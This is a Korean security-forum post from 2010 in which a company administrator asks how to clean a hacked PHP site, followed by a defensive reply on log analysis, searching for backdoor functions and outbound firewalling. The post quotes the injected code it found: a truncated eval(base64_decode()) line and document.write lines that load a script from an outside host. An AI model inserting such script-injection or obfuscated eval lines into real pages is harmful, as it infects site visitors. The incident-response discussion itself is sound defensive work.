크래킹 피해

423,

4/22

basscraft

백도어 관련 문의

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_recover&no=473 [복사]

회사에서 호스팅하고 있는 서버에 해킹을 당해서
소스가 엉망이 되었습니다.

거의 10년 전쯤 php로 개발된 사이트입니다.
OS는 리눅스 입니다.

확인해 보니 php 파일 맨 처음에

<?php eval(base64_decode('aWYoIWZ1b... 생략...XSkpOw==')); ?>

이런 소스가 인젝션되어 있었습니다.
find 명령으로 'eval(base64_decode(' 문자열을 포함한 소스를 찾아보았더니
폴더별로 index.php 또는 index*.php 등 파일들에 인젝션되어 있습니다.

추가로 .js, .html 파일들에도

document.write('<script src=http://chefs.yoursecretchefs.com/images/gifimg.php ><\/script>');
document.write('<script src=http://chefs.yoursecretchefs.com/images/gifimg.php ><\/script>')
;document.write('<script src=http://chefs.yoursecretchefs.com/images/gifimg.php ><\/script>');

이런 내용들이 주입되어 있습니다.
관리를 제대로 못하고 있어서 소스도 백업이 안된 상태 -0-;;;;
노가다라도 일일히 찾아서 지우면 되겠지만

문제는 인젝션된 소스중 일부는 중간부분 이후 소스가 뭉텅 잘려버린 것들이 존재해서
복구가 불가능한 상태입니다.(오래된 소스를 찾아서 복구하고 있는중...)
복구를 다 한다고 해도 백도어 같은게 존재해서 또다시 들어올 것 같아서

어느사이트에서 본 확인 방법으로 확인해 보니

[aaa@xxx dev]$ find /dev -type f -exec ls -l {} \;
-rw-r--r-- 1 root root 196608 2월 27 04:47 /dev/.udev.tdb

이런 결과가 있습니다.
저게 백도어 맞는지...

당장 다시 설치하고 싶지만
일단 이번 문제만 어떻게 넘기고
사이트 리뉴얼을 하기로 잠정 합의된 상태입니다.

조언좀 부탁드립니다.

1. 추측되는 해킹의 방법
2. 해킹의 목적 예상되는 피해(회사 내, 외부)
3. 소스 복구시 유의할 점
4. 백도어 제거 및 시스템 정상화에 대한 조언

질문이 너무 많습니다만...
개별 항목이라도 답변주시면 복받으실 껍니다 ^^

Hit : 4887 Date : 2010/03/03 10:00


멍멍	1. 위 정보만으로는 추측하기 힘드나 주로 웹해킹이 많습니다. 파일이 변경된 시간에 해당하는 웹 로그를 분석해 보세요. 2. Script가 삽입된 것으로 보아 추가적인 Client 장악 시도가 예상됩니다. IE 브라우져위 취약점을 이용하여 웹 사이트를 방문하는 다른 Windows 사용자들을 추가 장악하는 것을 말합니다. 3. eval 외에도 system, exec, passthru, popen 함수 또한 백도어로 사용 가능하니 함께 검색해보세요 4. 크래킹을 야기한 취약점을 찾지 못하면 복구 후에도 재감염 될 가능성이 높습니다. Script를 심는 패턴은 웜(자동 공격)에 의한 공격일 가능성이 크기 때문입니다. iptables를 이용한 방화벽 정책 설정 또한 공격 방어에 도움이 될 것입니다. (outbounding -안에서 밖으로 나가는- 패킷 차단 등) 5. 답변 안 하면 복 못 받는건가요? ^^	2010/03/09